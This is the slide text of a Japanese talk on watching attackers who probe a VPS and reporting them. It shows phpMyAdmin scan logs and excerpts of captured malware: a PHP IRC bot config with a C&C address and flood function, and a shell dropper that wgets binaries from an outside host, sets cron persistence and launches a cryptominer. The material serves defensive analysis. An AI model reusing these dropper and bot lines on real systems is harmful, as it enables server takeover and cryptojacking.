さくらのVPSに来る悪い人を観察して通報してインターネットを少し良くする
- 6. Webサーバでよく見るログ
"GET /w00tw00t.at.blackhats.romanian.anti-sec:)
HTTP/1.1" 404
"GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200
"GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404
"GET /pma/scripts/setup.php HTTP/1.1" 404
"GET /myadmin/scripts/setup.php HTTP/1.1" 404
"GET /MyAdmin/scripts/setup.php HTTP/1.1" 404
"GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200
"POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200
Damn it!
(チクショウ!)
さくらのVPSに来る悪い人の観察・通報・良くする (@ozuma5119)
6
- 7. phpMyAdmin
• php + MySQL のWebツール
• 致命的な脆弱性が数多く、今まで、そし
てこれからも、狙われ続ける運命
– CVE-2009-1151 [config.inc.php] 任意コード実行
可能
– CVE-2011-2505 [swekey.auth.lib.php] セッショ
ン操作可能
– その他、たくさん数え切れないほど
さくらのVPSに来る悪い人の観察・通報・良くする (@ozuma5119)
7
- 10. きょう、観察するWebアクセス
107.20.154.237 - - [31/Jan/2014:14:15:24 +0900] "GET
/phpMyAdmin/scripts/setup.php HTTP/1.1" 200 748 "-"
"ZmEu"
スキャンから12分後に攻撃
......(省略)
107.20.154.237 - - [31/Jan/2014:14:27:29 +0900] "POST
/phpMyAdmin/scripts/setup.php HTTP/1.1" 200 748
"http://153.120.5.227/phpMyAdmin/scripts/setup.php"
"Opera"
※ApacheでReWriteして200 OK返してるだけなので、ファイルは存在しな
い
さくらのVPSに来る悪い人の観察・通報・良くする (@ozuma5119)
10
- 13. ダウンロードしてみた
<?php
....(省略).....
class pBot
指令を出すC&C(コマンド&コントロール)サーバ
{
var $config = array("server"=>"74.208.201.122",
"port"=>"3303", "key"=>"*", "prefix"=>"Geox",
"maxrand"=>"8", "chan"=>"#q", "trigger"=>".",
"hostauth"=>"localhost");
var $users = array();
function start()
.....(省略)......
function udpflood($host,$port,$time,$packetsize) {
.....(省略)......
さくらのVPSに来る悪い人の観察・通報・良くする (@ozuma5119)
13
- 18. 指示されたファイルaを取得
#!/bin/sh
crontab -r
自動アップデー
cd /tmp
rm -rf a* c* update*
ト機能付き
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
wget http://62.193.234.3/update >> /dev/null &&
chmod u+x update
rm -rf /etc/cron.hourly/update
cp update /etc/cron.hourly/
.......(続く) ..........
さくらのVPSに来る悪い人の観察・通報・良くする (@ozuma5119)
18
- 19. ファイルaの続き。
wget http://62.193.234.3/clamav
wget http://62.193.234.3/sh
chmod +x sh
chmod +x clamav
mv clamav bash
kill -9 `ps x|grep stratum|grep -v grep|awk '{print $1}'`
PATH="." bash -o stratum+tcp://176.31.255.138:3333 -O
geox.1:xxxxxx -B
PATH="." sh -o stratum+tcp://176.31.255.138:3333 -O
geox.1:xxxxxx -B
• clamavとshという、2つのファイルを実行した
いようだ。
• これは2つともバイナリ実行ファイルでした
さくらのVPSに来る悪い人の観察・通報・良くする (@ozuma5119)
19